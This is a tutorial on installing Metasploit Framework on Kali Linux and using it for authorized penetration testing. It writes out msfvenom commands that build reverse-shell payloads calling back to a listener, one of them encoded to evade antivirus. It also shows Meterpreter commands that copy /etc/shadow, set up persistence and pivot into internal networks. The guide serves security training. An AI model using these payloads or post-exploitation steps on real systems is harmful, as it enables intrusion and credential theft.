Metasploit Framework is an open-source penetration testing platform developed by Rapid7 that gives security professionals the tools to find vulnerabilities, develop exploits, and validate security measures. It ships with thousands of exploit modules, payload generators, auxiliary scanners, and post-exploitation tools – making it the standard toolkit for authorized security assessments.

This guide covers how to install and use Metasploit Framework on Kali Linux 2025.x/2026.x. We walk through verifying the pre-installed version, manual installation on Ubuntu/Debian, Docker deployment, database setup, msfconsole navigation, network scanning, vulnerability assessment, payload generation with msfvenom, and Meterpreter post-exploitation – all within the context of authorized penetration testing.

Legal and Ethical Disclaimer

Metasploit is a powerful security tool. Using it against systems you do not own or do not have explicit written authorization to test is illegal in most jurisdictions and can result in criminal charges. Every example in this guide assumes you are working in a controlled lab environment or have documented, signed permission from the system owner. Always follow your organization’s rules of engagement and applicable laws. If you are new to ethical hacking, understand the legal boundaries before running any scans or exploits.

Prerequisites

  • Kali Linux 2025.x or 2026.x (bare metal, VM, or WSL2) – see our guide on how to install Kali Linux if needed
  • At least 4 GB RAM (8 GB recommended for running multiple modules)
  • 2+ CPU cores
  • 10 GB free disk space for the framework, database, and logs
  • Root or sudo access
  • Network access to target systems (authorized lab only)
  • Written authorization for any non-lab testing

Metasploit Framework Components

Before jumping into installation, here is a quick overview of the main components you will work with:

  • msfconsole – the primary command-line interface for interacting with the framework. This is where you search for modules, configure exploits, and run attacks
  • msfvenom – standalone payload generator and encoder. Creates shellcode, executables, and web payloads in dozens of formats
  • Meterpreter – an advanced post-exploitation agent that runs in memory on a compromised host, providing file access, pivoting, privilege escalation, and more
  • Modules – the building blocks: exploits, auxiliary scanners, post-exploitation scripts, payloads, and encoders
  • msfdb – manages the PostgreSQL database backend for storing scan results, credentials, and loot

Step 1: Install Metasploit Framework on Kali Linux

Kali Linux ships with Metasploit Framework pre-installed. Verify it is present and check the version.

msfconsole --version

Expected output:

$ msfconsole --version
Framework Version: 6.4.x-dev

If the command returns a version string, you are good to go. If it is missing or you want the latest version, update through apt.

sudo apt update && sudo apt install -y metasploit-framework

Verify the update completed.

msfconsole --version

Install Metasploit on Ubuntu/Debian (Manual Method)

On Ubuntu or Debian systems that do not include Metasploit by default, use the official Rapid7 installer script. This works on Ubuntu 22.04/24.04 and Debian 12/13. For reference, you can also check the Metasploit guide for Ubuntu and Debian.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

The installer downloads the omnibus package, installs all dependencies, and places binaries under /opt/metasploit-framework/bin/. After installation, add the path if needed.

echo 'export PATH=/opt/metasploit-framework/bin:$PATH' >> ~/.bashrc
source ~/.bashrc
msfconsole --version

Install Metasploit Using Docker

Docker provides a quick way to run Metasploit without modifying your host system. Make sure Docker is installed on Kali Linux first.

docker pull rapid7/metasploit-framework

Run the container with host networking so scans can reach your lab network.

docker run --rm -it --net=host rapid7/metasploit-framework msfconsole

For persistent data between sessions, mount a volume.

docker run --rm -it --net=host -v msf_data:/root/.msf4 rapid7/metasploit-framework msfconsole

Step 2: Set Up the PostgreSQL Database

Metasploit uses PostgreSQL to store host data, scan results, credentials, and loot. Without a database, you lose results between sessions and cannot use workspace features. On Kali Linux, PostgreSQL is already installed.

Start the PostgreSQL service and enable it to start on boot.

sudo systemctl start postgresql
sudo systemctl enable postgresql

Initialize the Metasploit database.

sudo msfdb init

Expected output:

$ sudo msfdb init
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

Verify the database connection from within msfconsole.

msfconsole -q -x "db_status; exit"

You should see:

$ msfconsole -q -x "db_status; exit"
[*] Connected to msf. Connection type: postgresql.

Workspace Management

Workspaces keep scan data separated by engagement or project. All data you collect – hosts, services, vulnerabilities, credentials – is stored in the active workspace.

Inside msfconsole, list existing workspaces.

workspace

Create a new workspace for a project.

workspace -a lab_pentest_2026

Switch to it.

workspace lab_pentest_2026

Delete a workspace when the engagement is complete.

workspace -d lab_pentest_2026

Switch back to the default workspace.

workspace default

Step 3: Navigate Msfconsole – Commands and Module Types

Launch msfconsole.

msfconsole

Here are the essential commands you need to know:

CommandDescription
searchSearch for modules by name, CVE, platform, type
useSelect a module to configure and run
infoDisplay detailed information about the current module
show optionsList configurable parameters for the current module
setSet a module option (e.g., RHOSTS, LHOST)
run / exploitExecute the current module
backDeselect the current module and return to the main prompt
sessionsList active sessions (shells, Meterpreter, etc.)
sessions -i <id>Interact with a specific session
helpShow all available commands

Module Types

Metasploit organizes its capabilities into module categories:

  • Exploits – code that takes advantage of a vulnerability to gain access (e.g., buffer overflows, SQL injection)
  • Auxiliary – scanners, fuzzers, and information-gathering tools that do not deliver a payload
  • Post – post-exploitation modules for privilege escalation, data collection, and persistence after gaining access
  • Payloads – code delivered by an exploit to run on the target (reverse shells, Meterpreter, command execution)
  • Encoders – transform payloads to evade signature-based detection
  • Evasion – generate evasion-specific payloads to bypass security products

Searching for Modules

The search command supports filters to narrow results. Here are practical examples.

Search for Linux exploits related to a specific CVE.

search type:exploit platform:linux cve:2024

Search for SMB-related auxiliary scanners.

search type:auxiliary name:smb

Search for a specific service exploit.

search type:exploit name:apache

List all post-exploitation modules for Linux.

search type:post platform:linux

Step 4: Network Scanning with Metasploit

Metasploit integrates directly with Nmap through the db_nmap command. Results are stored in the database automatically, so you can query them later without re-scanning.

Host Discovery with db_nmap

Run a service version scan against a lab subnet.

db_nmap -sV -O 192.168.1.0/24

This performs OS detection (-O) and service version detection (-sV) across the whole subnet. For a faster initial sweep, use a ping scan first.

db_nmap -sn 192.168.1.0/24

Then do a targeted scan on discovered hosts.

db_nmap -sV -p 1-10000 192.168.1.10

TCP Port Scanning Module

Metasploit also has its own port scanner module that feeds results directly into the database.

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 21,22,23,25,80,110,139,443,445,3306,3389,5432,8080
set THREADS 20
run

SMB Version Detection

Identify SMB versions on discovered Windows hosts. This is useful for finding systems vulnerable to EternalBlue or other SMB exploits.

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

Reviewing Scan Results

After running scans, query the database to review what was found.

List all discovered hosts.

hosts

List all discovered services.

services

Filter services by port.

services -p 445

List known vulnerabilities from scan data.

vulns

Step 5: Vulnerability Scanning with Metasploit

Beyond port scanning, Metasploit includes auxiliary modules for identifying specific vulnerabilities.

Web Directory Scanner

Discover hidden directories and files on a web server.

use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.10
set RPORT 80
set THREADS 10
run

HTTP Version Detection

use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.0/24
run

Finding Exploits for Discovered Services

After scanning, match discovered services against available exploits. If you found Apache 2.4.49 running on a target, search for known exploits.

search type:exploit name:apache 2.4

Or search by CVE if you have vulnerability scan results from a tool like Nessus.

search cve:2021-41773

Use the vulns command to check if any automated vulnerability data has been stored, then cross-reference with available modules.

Step 6: Generate Payloads with Msfvenom

Msfvenom is the standalone payload generation tool. It combines the old msfpayload and msfencode tools into a single utility. Use it to generate shellcode, executables, and web shells for authorized testing.

Linux Reverse Shell

Generate a Linux 64-bit Meterpreter reverse TCP payload as an ELF binary.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o /tmp/shell.elf

Windows Reverse Shell

Generate a Windows 64-bit Meterpreter payload as a PE executable.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /tmp/shell.exe

Web Payloads

PHP reverse shell – useful for testing web application upload vulnerabilities.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o /tmp/shell.php

JSP payload for Java application servers.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o /tmp/shell.jsp

WAR file for deploying to Tomcat or similar servlet containers.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o /tmp/shell.war

Encoding Payloads

Encoding helps evade basic signature-based detection. Use the -e flag with an encoder and -i for iteration count.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x64/xor_dynamic -i 5 -f exe -o /tmp/encoded_shell.exe

Note that modern antivirus and EDR solutions use behavioral analysis, not just signatures. Encoding alone is not sufficient to bypass them in real engagements.

Listing Available Formats and Payloads

List all output formats.

msfvenom --list formats

List all available payloads.

msfvenom --list payloads

List all encoders.

msfvenom --list encoders

Step 7: Setting Up a Listener (Handler)

After generating a payload, you need a listener to catch the incoming connection. This is done with the multi/handler module in msfconsole.

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run

The handler waits for an incoming connection. When the payload executes on the target (in your authorized lab), a Meterpreter session opens. For Windows payloads, change the payload line accordingly.

set payload windows/x64/meterpreter/reverse_tcp

To run the handler in the background so you can continue using msfconsole, use run -j instead of run.

Step 8: Meterpreter Post-Exploitation

Once you have a Meterpreter session on an authorized test system, you have a powerful set of post-exploitation capabilities. All commands below run inside the Meterpreter prompt.

System Information and Basics

Gather information about the compromised system.

sysinfo

Check the current user context.

getuid

Drop into a native system shell.

shell

Type exit to return to the Meterpreter prompt from the shell.

File Operations

Upload a file to the target.

upload /tmp/linpeas.sh /tmp/linpeas.sh

Download a file from the target.

download /etc/shadow /tmp/shadow_copy

Read a file on the target without downloading.

cat /etc/passwd

List files in a directory.

ls /home

Network Pivoting

If the compromised host has access to internal networks your attack machine cannot reach directly, use Meterpreter to pivot.

View network interfaces on the target.

ipconfig

Add a route through the Meterpreter session to reach a new subnet. Run this from the msfconsole prompt (background the session first with background).

route add 10.0.2.0/24 1

The 1 refers to the session ID. Now you can scan and exploit hosts on the 10.0.2.0/24 network through the compromised host.

Persistence and Cleanup

In a real engagement, you may need persistence to maintain access across reboots. Metasploit has post-exploitation modules for this.

run post/linux/manage/sshkey_persistence

For Windows targets:

run post/windows/manage/persistence_exe

After completing your assessment, always clean up. Remove any files you uploaded, kill persistence mechanisms, and document everything you did. Professional penetration testers leave the target in the same state they found it.

Step 9: Armitage – Graphical Interface for Metasploit

Armitage is a Java-based GUI that sits on top of Metasploit Framework. It provides a visual network map, drag-and-drop exploit execution, and collaborative features for team assessments.

Install Armitage on Kali Linux.

sudo apt install -y armitage

Launch Armitage (the database must be initialized first).

armitage

Armitage connects to msfconsole in the background. It is useful for beginners who prefer a visual workflow, but experienced testers typically stick with msfconsole for speed and scriptability.

Step 10: Integration with External Tools

Metasploit can import results from other scanning tools, saving time and avoiding duplicate scans.

Import Nmap XML Results

If you already ran Nmap outside of Metasploit, import the XML output.

nmap -sV -O 192.168.1.0/24 -oX /tmp/nmap_scan.xml

Then inside msfconsole:

db_import /tmp/nmap_scan.xml

Verify the imported data.

hosts
services

Import Nessus Results

Export your Nessus scan as a .nessus file, then import it.

db_import /tmp/nessus_scan.nessus

Metasploit also supports importing results from Qualys, Nexpose, OpenVAS, and other scanners. Check supported formats with db_import -h.

Exporting Data for Reports

Export host data and findings for your penetration test report.

hosts -o /tmp/hosts_report.csv
services -o /tmp/services_report.csv
vulns -o /tmp/vulns_report.csv

These CSV files can be imported into your reporting tool or spreadsheet for documentation.

Security Best Practices for Using Metasploit

  • Always get written authorization – a formal scope document or contract defining what systems you can test, when, and what methods are allowed
  • Keep Metasploit updated – new modules and bug fixes are released regularly. On Kali, update with sudo apt update && sudo apt upgrade metasploit-framework
  • Use isolated lab environments – run vulnerable VMs like Metasploitable, DVWA, or HackTheBox machines for practice. Never test on production systems without authorization
  • Practice responsible disclosure – if you find a vulnerability in a real system, report it to the vendor or organization through proper channels. Refer to the official Metasploit documentation for guidance on responsible use
  • Document everything – keep detailed logs of all commands, timestamps, and results for your report and legal protection
  • Clean up after engagements – remove payloads, reverse any changes, and ensure targets are restored to their original state
  • Use workspaces – separate data by client or engagement to avoid cross-contamination of results
  • Protect your Metasploit host – your attack machine holds sensitive data about discovered vulnerabilities. Encrypt the disk and restrict access

Conclusion

You now have Metasploit Framework installed and configured on Kali Linux with a working PostgreSQL database, msfconsole navigation skills, network and vulnerability scanning techniques, payload generation with msfvenom, and Meterpreter post-exploitation basics. This is the foundation for any authorized penetration testing engagement.

For production security assessments, combine Metasploit with other tools in your workflow – run Nessus or OpenVAS for broad vulnerability scanning, use Metasploit for validation and exploitation, and maintain thorough documentation throughout. Always work within the scope of your authorization and follow responsible disclosure practices.

Related Guides

RELATED ARTICLESMORE FROM AUTHOR

1 COMMENT

LEAVE A REPLY

Please enter your comment!
Please enter your name here